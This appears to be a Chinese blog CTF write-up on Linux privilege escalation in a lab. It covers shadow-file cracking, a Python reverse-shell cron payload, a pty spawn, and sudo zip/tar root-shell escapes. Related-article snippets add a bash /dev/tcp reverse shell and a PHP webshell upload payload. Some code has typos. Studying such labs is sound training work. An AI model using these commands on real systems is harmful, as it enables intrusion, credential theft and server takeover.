15.CTF-web安全提权

最新推荐文章于 2024-08-20 09:48:14 发布
最新推荐文章于 2024-08-20 09:48:14 发布
阅读量2.3k 收藏 13
点赞数 1
分类专栏: ctf 文章标签: web安全 linux 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/woo233/article/details/127084490
版权

安全提权介绍

往往我们能拿下服务器的web服务只是具有低权限用户(www-data),对于内网渗透,我们需要提权到root。Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。

提权前提:
已经拿到低权shell
被入侵的机器上面有nc,python,perl等linux非常常见的工具
有权限上传文件和下载文件

实验环境

攻击机: kali linux 192.168.253.12
靶场机器:linux 192.168.253.21

接下来该做什么呢?
目的:目前获得反弹www-data用户shell,获型靶场机器的root权限,得到flag值;

内核漏洞提权

内核漏洞是我们几乎最先想到的提权方法。通杀的内核漏洞是十分少见的,因而我们应该先对系统相关的信息进行收集。

查看发行版本
cat /etc/ issue
cat /etc /*-release

查看内核版本
uname -a
在这里插入图片描述

寻找内核溢出代码
– searchspoit 发行版本 内核版本
在这里插入图片描述

若存在内核溢出:
上传内核溢出代码,编译执行-- gcc xxx.C -o exploit
– chmod +x exploit
– ./exploit

发现无内核溢出:可以用明文root密码提权

大多linux系统的密码都和/etc/passwd和/etc/ shadow这两个配置文件息息相关。passwd里面储存了用户,shadow里面是密码的hash。
出于安全考虑passwd是全用户可读,root可写的。shadow是仅root可读写的。

例如:破解linux用户名和对应的密码

/etc/passwd /etc/shadow  #获取了passwd和shadow之后

unshadow passwd shadow >cracked #将其转化为可识别的cracked文件
iohn cracked  #使用john来破解

在这里插入图片描述
不能使用明文root进行提权,还可以尝试使用计划任务进行提权

计划任务

系统内可能会有一些定时执行的任务,一般这些任务由crontab来管理,具有所属用户的权限。非root权限的用户是不可以列出root用户的计划任务的。但是/etc/内系统的计划任务可以被列出。

默认这些程序以root权限执行,如果有幸遇到一个把其中脚本配置成任意用户可写的管理员,我们就可以修改脚本等回连rootshell;如果定时执行的文件是py脚本,可以使用一下的脚本来替换之前的脚本;

靶场代码
#!/usr/bin/python
import os,subprocess,socket
s=socket.socekt(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“攻击机IP地址”,攻击机监听端口"))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

攻击机启动nc 监听端口nc -nlvp port

在这里插入图片描述
发现无可写文件。可以尝试发掘对应的密码

密码复用

很多管理员会重复使用密码,因此数据库或者web后台的密码也许就是root密码。

有了(疑似) root密码怎么办?你一定想ssh登陆。然而ssh很可能禁止root登陆,或是防火墙规则将你排除在外了。返回来想,我们不是有一个低权shell了吗?找个办法再上面“输入”密码就好了。显然,直接在低权shell里面用sudo是不奏效的。这是因为出于安全考虑,linux要求用户必须从终端设备(tty)中输入密码,而不是标准输入(stdin)。换句话说,sudo在你输入密码的时候本质上是读取了键盘,而不是bash里面输入的字符。

因此为了能够输入密码,我们必须模拟一个终端设备。python就有这样的功能。
在shell里面输入:

python -c 'import pty;pty.spawn(" /bin/bash")' #可以尝试/bin/sh 或者/bin/bash

在这里插入图片描述
尝试了3次弱口令之后不行,则进行对应敏感文件的挖掘
pwd查看当前工作目录
切换到home目录
在这里插入图片描述
发现有个ssh,则可以使用该用户远程登陆服务器
还发现一个wordpress
在这里插入图片描述

cat wp-config.php文件
在这里插入图片描述
可以进行远程登陆:
在这里插入图片描述
登陆之后,使用sudo -l查看当前用户可以使用root提权的命令信息;
在这里插入图片描述

1.利用zip进行提权
– touch exploit
– sudo -u root zip exploit.zip exploit -T --unzip -command=“sh -c /bin/bash”

在这里插入图片描述
2.利用tar进行提权
– sudo -u root tar cf /dev/null exploit -checkpoint=1 --checkpoint-action=“/bin/bash”

获取Flag

一般情况下,靶场机器的flag值是存放在服务器的根目录下,/ root/目录。
cd /root/
ls
cat flag
在这里插入图片描述

writeup测试文档总结文档

CTF-普通用户
IT小学子的博客
05-03 3430
文章目录:1. 利用内核漏洞2. 利用明文root密码3. 利用定时计划任务4. 密码复用5. 利用zip 在我们拿下服务器web服务往往只是低限用户,对于内网渗透,我们往往需要root限,Linux系统包括使用溢出漏洞已及利用系统配置文件。 :   1.拿到低限shell   2.被入侵机器上有nc,python,perl等常见linux下的工具  ...
CTF-Web】XSS漏洞学习笔记(附ctfshow web316-333题目)
jayq1的博客
06-07 5212
XSS
webshll工具包
12-02
webshll工具包 NC PR CMD Churrasco 工具全部已经免杀 无后门 webshll利器啊
CTF-
su__xiaoyan的博客
01-06 2388
通过Web服务拿下服务器的基础限以后(www-data),如何值最高的系统限(root)。 的前条件: 获取服务器的基础限。 能上传或者下载文件。 靶机上面有常见工具或者环境,例如nc,python或者Perl。 Linux操作系统方法: 利用内核漏洞进行 利用错误的系统配置进行 明文密码 计划任务 密码复用 内核漏洞 首先查看系统Linux的发行版本: cat /etc/issue cat /etc/*-release 查看内核版本
WEB
forbidd3n,keep going
10-25 3507
本文转自《剑眉大侠笔记》,个人觉得思路想法很好,就转载了,其中蓝色字体为本人笔记 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 注:若net被禁用,可使用aio工具,可进行账户的克隆,该工具还有很多用户,请自行了解 2.
ctf&
m0_73973498的博客
11-25 1055
SUID(Set User ID)是一种特殊限,当用户执行具有SUID位的可执行文件时,该文件将以文件所有者的身份而不是执行者的身份运行。这允许普通用户在执行特定程序时获取特限。
CTF-常见的几种web方法
Reaches_r的博客
08-10 1835
1.内核漏洞 2.明文密码暴力破解3.计划任务 4.密码复用 5.利用zip、tar
CTF web安全经典例题讲解
10-22
本主题集中于CTF赛题中的Web安全部分,通过一系列经典例题来帮助初学者理解和掌握核心技能。以下是根据标题、描述和标签炼出的相关知识点: 1. **SQL注入**:SQL注入是Web应用中常见的安全漏洞,攻击者通过输入...
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑示例(一)1
08-03
【网络安全自学篇】六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑示例(一)1 本文主要讲述了网络安全中的靶机渗透技术,特别是通过Vulnhub平台进行环境搭建和JIS-CTF挑战。Vulnhub是一个供虚拟机...
web
qq_40495877的博客
04-29 2145
这里利用冰蝎远程连接到了靶机上: 利用systeminfo查看靶机系统的补丁; 如果有限可以在靶机上创建txt文件保存,在用冰蝎下载下来,没有的话就复制粘贴到本地txt文件。 然后就利用本机下载的wesng去对比补丁库吧,命令如下: wesng目录下: python wes.py systeminfo.txt -o vuln.csv 对比结果保存为vuln.csv文件: 这里我们就有可利用的补丁漏洞了; 接下来用linux或者忍者系统去创建一个远程木马 命令行下: msfvenom -
CTF实战综合题_取证,零基础入门到精通,收藏这一篇就够了
Python_0011的博客
08-20 549
.- -. -.---. --. .-CTF综合题考核一个人的综合能力,运用各种技术及各种工具来解决某个实际遇到的问题,这类题目往往会考核、加密、防火墙、数据恢复、解密等综合利用,可能难度不是最高,但一个问题的解决往往是下一个问题的示,可以说是环环相扣,下面以一个实例来解释这类综合题,由于当时做题有些图片为截取,因此只能通过文字进行描述。CTF中的“综合题”经常出现在最后,相对难度较高,给的分数也相对比较高,如图1所示,在某CTF比赛中,可以看到第8题踏雪寻梅 ,难度系数四星,分值20分。
升第一天-简单Web升&转移
weixin_39953838的博客
12-26 634
你能成功,却不了你在她心里的位置。
CTF靶场内核漏洞 夜车星繁的博客
夜车星繁的博客
03-29 1066
VMWARE虚拟机下搭建环境: 攻击机kali IP:192.168.223.136 攻击机win10:本机 靶 机IP:192.168.223.141 首先进行信息收集: nmap -sV 192.168.223.141 更详细的信息:nmap -T4 -A -v192.168.223.141 以上我们得知系统类型,Apache版本、所开放服务端口等重要信息 除...
web思路
09-11 215
1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:windowstempcookiesnet1.exe user 2.成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚的用户登录进去就是system限,再试试一般就可以了。 3.cmd拒绝...
Guest升方法总结
Another's story
07-31 2419
  现在的入侵是越来越难了,人们的安全意识都普遍高了不少,连个人用户都懂得防火墙,杀毒软件要装备在手,对于微软的补丁升级也不再是不加问津。因此现在我们想在因特网上扫描弱口令的主机已经几乎是痴心妄想了。(这可是一件大大的好事啊。) 但是这也使得我们作黑客的进行入侵检测达到了一个前所未有的难度。通过各种手段,我们通常并不能直接获得一个系统的管理员限。比如我们通过某些对IIS的攻击,只
windows web
zyw268的博客
05-29 806
Web到Win-系统-人工操作如果中无法执行命令的话,可以尝试上传cmd.exe到可读写目录再调用优点:解决实时更新不集成的EXP缺点:操作繁琐,需要各种复现调试。
AI:web1
qq_39742838的博客
12-09 374
1.AI:web1前期端口扫描和sql注入不再了,教程也有很多,直接说。 2.傻傻的上传了一个php文件,想要反弹shell,bash -i >& /dev/tcp/192.168.133.128/4444 0>&1,监听4444端口,访问这个php文件,结果并没有结果,一定是姿势不对。 3.监听4444端口 在kali os-shell执行 py...
Web的基本漏洞--
尽欢
06-05 661
的介绍
CTF实战web题,从升放弃到命令执行操作拿下lag
weixin_45129718的博客
06-05 503
访问一下看看源码写的啥,可以看出使用异或(XOR)加密算法,rand_str()方法未声明、文件包含config.php(具体不知道内容)尝试很多命令cat、more,可以读取但无法显示数据,不知为啥有知道的师傅麻烦指点一下。突然想起前边有一题可以文件读取的跟这题的端口一样,看能不能获取一些重要信息,直接干。呜呜呜呜呜呜,,扔到linux主机可以绕过的,奇怪;根据上面的分析的结果;大概意思就是,想要是都去到flag,让代码的逻辑运算走最后的IF;天无绝人之路,那就换个命令,以下为linux查看文件命令。
ctf web文件上传.user
最新发布
03-24
### CTF Web 文件上传漏洞利用技巧 #### 背景概述 文件上传漏洞是CTF竞赛中常见的Web安全挑战之一。这种类型的漏洞通常涉及攻击者通过绕过前端或后端验证机制,成功上传恶意脚本到目标服务器上,并最终实现远程代码执行(RCE)[^2]。 #### 核心概念与技巧分析 1. **ThinkPHP框架的理解** 在某些CTF题目设计中,重点可能并非单纯的文件上传漏洞本身,而是对特定框架(如ThinkPHP)的工作原理及其潜在缺陷的深入理解[^1]。例如,在ThinkPHP中可能存在路径解析错误、扩展名过滤不严格等问题,这些都可能导致恶意文件被成功加载和执行。 2. **前端校验绕过** 很多应用会在客户端层面实施初步检查,比如限制文件类型为图像格式(.jpg,.png),然而这类防护措施很容易遭到规避。由于所有的输入都应该视为不可信,所以即使存在HTML表单中的`accept="image/*"`属性或者其他JavaScript逻辑判断,也完全可以通过修改HTTP请求参数来跳过它们。 3. **后端处理漏洞** - **MIME Type伪造**: 即使服务端设置了严格的白名单策略只接受指定几种媒体类型(`Content-Type`),仍然有可能通过设置虚假头信息欺骗程序继续运行。 ```http Content-Disposition: form-data; name="file"; filename="shell.jpg" Content-Type: image/jpeg ``` 上述例子展示了如何伪装成合法JPEG图片交实际包含PHP命令的内容[^3]。 - **零宽字符(%00)**: 当检测依赖于字符串截断操作时(即遇到NULL字节就停止读取剩余部分), 可以尝试附加`\x00`至文件名末尾使得后续附加的真实扩展名失效[^5]: ``` POST /upload.php HTTP/1.1 Host: target.com ... ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="uploaded_file"; filename="test.php%00.jpg" ``` 4. **其他高级技术** 对于更复杂的场景,则需考虑更多因素,例如: - 使用双写法构造特殊结构的数据流; - 结合其他已知弱点形成组合拳效果 (如SQL注入配合); - 探索非标准协议下的异常行为模式等等[^4]. 以下是基于Python的一个简单示例用于模拟基本POST方式发送带payload的文件: ```python import requests url = 'http://example.com/upload' files = {'file': ('shell.php', '<?php echo shell_exec($_GET["cmd"]); ?>', 'application/octet-stream')} response = requests.post(url, files=files) if response.status_code == 200: print('File uploaded successfully.') else: print(f'Error uploading file: {response.text}') ``` 此代码片段演示了怎样构建自定义请求体并将隐藏功能嵌入看似正常的附件之中。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wow2ok

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值